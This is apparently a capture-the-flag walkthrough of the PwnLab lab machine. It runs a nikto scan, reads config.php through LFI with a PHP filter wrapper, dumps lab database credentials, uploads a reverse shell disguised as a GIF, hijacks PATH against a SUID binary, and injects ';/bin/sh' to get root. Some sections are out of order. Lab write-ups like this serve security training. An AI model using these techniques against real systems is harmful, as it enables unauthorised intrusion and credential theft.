nikto -h 192.168.10.14
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.10.14
+ Target Hostname: 192.168.10.14
+ Target Port: 80
+ Start Time: 2022-03-30 10:02:03 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ Cookie PHPSESSID created without the httponly flag
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2022-03-30 10:02:31 (GMT5.5) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We get a mention of /config.php file which could contain the database IDs and passwords
3. Initial Foothold
3.1 Local File Inclusion
Accessing the webpage, we see that there are three links that can be accessed : Home, Login, and Upload
As we access each of them we see that the url gets appended with /?page=name For eg: If we go to Login page, we see the url change from http://192.168.10.14 to http://192.168.10.14/?page=login and similarly for upload
When trying to access config.php directly by appending it to the url(http://192.168.10.14/?page=config) and also by adding a null byte (http://192.168.10.14/?page=config%00), does not yield any results
Then we try base64 encoding using a php wrapper: http://192.168.10.14/?page=php://filter/read=convert.base64-encode/resource=config, which gives us the base64 encode config.php page
Decoding it, we get the login credentials for the mysq database
Dumping the database using the credentials root : H4u%QJ_H99 obtained from the config.php file for possible usernames and/or password
mysql -h 192.168.10.14 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 62
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.002 sec)
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.003 sec)
MySQL [Users]> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.002 sec)
We get 3 users kent, mike and kane and their base64 encode passwords
Decoding them, we get possible credentials for login in to the webpage and/or the box
kent : JWzXuBJJNymike : SIfdsTEn6Ikane : iSv5Ym2GRo
Using any of the credentials, we can login to the web portal which will take you to the Upload page.
3.3 Reverse shell
We find that there are certain restricting in uploading files. It accept only images files
We can now rename .php extension of the reverse shell to .gif ; php-reverse-shell.gif
Also add the header GIF 98 at the start of the file to edit the magic byte (the first byte that identified the type of the file) to make it seem like a .gif file , from a text editor
Uploading the modified reverse shell, it goes through
we can find the uploaded file by going to /upload directory
Navigating to our uploaded GIF file, produces an error
There seems to be more filters in place
3.4 Filter Bypass
In order to find out how files are processed, we need the source code.
Getting index.php source from http://192.168.10.14/?page=php://filter/read=convert.base64-encode/resource=index and base64 decoding it
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
Here we see that, there is an attribute lang which, when passed to the cookie, can be used for multilingual support. As this function is not yet implemented, we need to set any other language manually through the cookie
There is an include() function, so there might be another possible LFI. It takes in a parameter of lang=anypath in the cookie value.
Capturing the upload file in burpsuit and modifying the cookie value to include the path of our uploaded reverse shell.
We can try to switch users with the credentials obtained from the database.
We are able to switch to user kane with the credentials kane : iSv5Ym2GRo
sudo -l does not give any results as sudo is disabled in the box.
kane@pwnlab:/home/mike$ sudo -l
bash: sudo: command not found
Using SUID bit to switch to other user. -> A file with SUID always executes as the user who owns the file, regardless of the user passing the command
find / -perm -04000 -type f -ls 2>/dev/null shows us the files with SUID bit set for the current user.
kane@pwnlab:~$ find / -perm -04000 -type f -ls 2>/dev/null
3603 36 -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
4989 40 -rwsr-xr-x 1 root root 38868 Nov 19 2015 /bin/su
3604 28 -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
18810 96 -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
27221 8 -rwsr-sr-x 1 mike mike 5148 Mar 17 2016 /home/kane/msgmike
5009 40 -rwsr-xr-x 1 root root 38740 Nov 19 2015 /usr/bin/newgrp
354 52 -rwsr-xr-x 1 root root 52344 Nov 19 2015 /usr/bin/chfn
17895 52 -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
358 52 -rwsr-xr-x 1 root root 53112 Nov 19 2015 /usr/bin/passwd
18898 96 -rwsr-sr-x 1 root mail 96192 Feb 11 2015 /usr/bin/procmail
355 44 -rwsr-xr-x 1 root root 43576 Nov 19 2015 /usr/bin/chsh
357 80 -rwsr-xr-x 1 root root 78072 Nov 19 2015 /usr/bin/gpasswd
11725 8 -rwsr-xr-x 1 root root 5372 Feb 24 2014 /usr/lib/eject/dmcrypt-get-device
2813 12 -rwsr-xr-x 1 root root 9540 Feb 11 2016 /usr/lib/pt_chown
18078 356 -rwsr-xr-- 1 root messagebus 362672 Aug 2 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
18859 552 -rwsr-xr-x 1 root root 562536 Jan 13 2016 /usr/lib/openssh/ssh-keysign
17980 1060 -rwsr-xr-x 1 root root 1085236 Mar 13 2016 /usr/sbin/exim4
Files at /usr/bin and /usr/lib might not help us in privesc via SUID. There is another interesting file msgmike at /home/kane
Checking the file type using file
kane@pwnlab:/$ cd /home/kane
kane@pwnlab:~$ file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
The file is an executable file.
Executing the file gives us an error
kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
4.2 PATH Variable.
From the error shown above, we see that the executable is trying to read a file called msg.txt using the cat command.
Checking the PATH variable as well as the location of the cat command
kane@pwnlab:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ which cat
/bin/cat
We can see that the cat command is in the third location (/bin) of the PATH variable.
It checks the first two locations and moves on as it does not find the cat command there.
In order to exploit the PATH variable, we need to provide a pseudo cat command which can spawn a shell when called. And its path should be before the original path of the cat command in the PATH variable for it to get executed first.
Creating an executable file named cat in the current directory, which will spawn a bash shell.
Now there is a cat command at the first location of the PATH variable, so it will get executed first when the command is called, and thus we get a shell as user mike.
kane@pwnlab:~$ ./msgmike
mike@pwnlab:~$
We became the user mike because the owner of the file msgmike with SUID set was mike
4.3 Command Injection
We find another vulnerable executable at mike's home folder called msg2root with SUID set and owner root
mike@pwnlab:~$ cd /home/mike
mike@pwnlab:/home/mike$ ls
msg2root
mike@pwnlab:/home/mike$ file msg2root
msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d3, not stripped
mike@pwnlab:/home/mike$ ls -la
total 28
drwxr-x--- 2 mike mike 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root
-rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile
Executing msg2root
mike@pwnlab:/home/mike$ ./msg2root
Message for root:
We find that any command the user inputs is passed to the /bin/echo command and eventually, appended to that messages.txt.Here command injection is possible.
We can directly pass in the command ;/bin/sh to execute and spawn a shell as root we use ; to break out of the echo command.
mike@pwnlab:/home/mike$ ./msg2root
Message for root: ;/bin/sh
whoami
root
This is a misconfiguration know as Local File Inclusion (LFI) and it allows an attacker to manipulate the target’s web server by including malicious files remotely or even access sensitive files present onto that server. You can read more about LFI
Trying to upload a php-reverse-shell.php reverse shell from (Make sure to change the IP and port)
In order to execute any Linux command, it checks the PATH variable for paths of the command. If the command is not found in the first location, it moves on to the next and so on. Read more about it
